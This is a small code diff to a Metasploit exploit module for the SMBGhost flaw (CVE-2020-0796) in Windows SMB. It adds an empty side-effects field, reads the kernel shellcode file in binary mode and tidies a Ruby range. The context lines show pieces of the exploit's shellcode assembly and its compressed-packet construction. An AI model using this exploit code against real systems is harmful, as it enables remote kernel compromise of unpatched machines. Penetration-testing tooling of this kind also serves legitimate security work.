@@ -80,7 +80,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
           'Stability' => [ CRASH_OS_RESTARTS, ],
           'Reliability' => [ REPEATABLE_SESSION, ],
-          'RelatedModules' => [ 'exploit/windows/local/cve_2020_0796_smbghost' ]
+          'RelatedModules' => [ 'exploit/windows/local/cve_2020_0796_smbghost' ],
+          'SideEffects' => []
         }
       )
     )
@@ -343,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_shellcode(pointers)
-    source = File.read(File.join(Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2020-0796', 'RCE', 'kernel_shellcode.asm'))
+    source = File.read(File.join(Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2020-0796', 'RCE', 'kernel_shellcode.asm'), mode: 'rb')
     edata = Metasm::Shellcode.assemble(Metasm::X64.new, source).encoded
     user_shellcode = payload.encoded
     edata.fixup 'PHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpApicRequestInterrupt]
@@ -417,7 +418,7 @@ class MetasploitModule < Msf::Exploit::Remote
         out << [ 0xb000 | (compressed.length - 1) ].pack('v')
         out << compressed
 
-        buf = buf[chunk_size..-1]
+        buf = buf[chunk_size..]
         break if buf.nil?
       end
 
